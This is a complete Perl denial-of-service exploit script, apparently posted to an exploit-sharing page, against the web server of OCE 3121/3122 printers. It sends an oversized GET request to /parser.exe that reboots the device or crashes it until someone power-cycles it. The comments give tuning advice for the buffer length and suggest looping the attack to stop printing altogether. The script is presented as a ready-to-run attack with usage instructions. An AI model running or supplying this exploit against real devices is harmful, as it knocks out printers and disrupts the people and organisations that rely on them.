#!/usr/bin/perl
#
#OCE 3121/3122 Printer DoS Exploit
#----------------------------
#By Herman Groeneveld aka sh4d0wman
#trancelover75 [AT] gmail.com
#
#Description: the printer runs a webserver to provide various printing tasks from
#java enabled browsers. Input is being filtered for bad characters.
#However it is vulnerable to a long url request. This will either reboot or crash the device.
#
#On crash, the "system" led on the printer changes from green to orange. No further printing is done
#until somebody resets the printer by flipping the powerswitch. E675 error displayed in printer display.
#On reboot, printing resumes after the device has completed it's reboot cycle.
#
#Crash is hard to accomplish. Play with the buffer input size. 261 worked at my printer.
#Values of 250/500/50000 are known to reboot the printer. No reliable size for crashing yet.
#
#Loop this exploit and printing will be nearly impossible. Tested: unhappy users. Not implemented.
#
#If you test this on your device, pls let me know the result. I had just 1 printer to test it at ;)
#
#Discovered: 29/03/2006
#Target: tested against OCE 3121/3122 printer.
#Vendor: www.oce.com (no response) use IO::Socket;
if (@ARGV != 3)
{
print " \n";
print " #OCE 3121/3122 Printer DoS Exploit# \n";
print "---------------------------------------------------------------\n";
print " Usage: crashoce.pl <target ip> <target port> <request length> \n";
print " Example: new.pl 127.0.0.1 80 250 \n";
print " Play with request length for reboot or crash effect. \n\n";
print " #Coded by sh4d0wman 31/03/2006# \n";
exit(1);
}
$targetip =$ARGV[0]; #user input, no much fun in attacking 127.0.0.1 is it?
$targetport =$ARGV[1]; #user input since vendor might change this some day, unlikely though :-)
$reqlength = $ARGV[2]; #user input since different sizes give different results
print "[-] OCE 3122 Printer DoS Exploit\n\n";
print "[-] Target IP: ";
print $targetip;
print "\n[-] Connecting to target IP...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$targetip",
PeerPort => "$targetport"); unless ($socket) { die "- Could not connect. Check IP & port. Hint: default port is 80!\n"}
print "[-] Connected to printer\n\n";
print "[-] Creating DoS request...\n";
$bufa='A'x$reqlength; #creating payload, length based on user input
print "[-] Sending request...\n\n";
print $socket "GET /parser.exe?".$bufa.".html"." HTTP/1.1\r\n\r\n";
sleep 5; #Be advised! Printer reaction to exploit can take up to 30 sec. Pls, be patient...
print "[>]Attack completed! Printer in error state or rebooting.\n";
close($socket);
推荐
评论(0条)
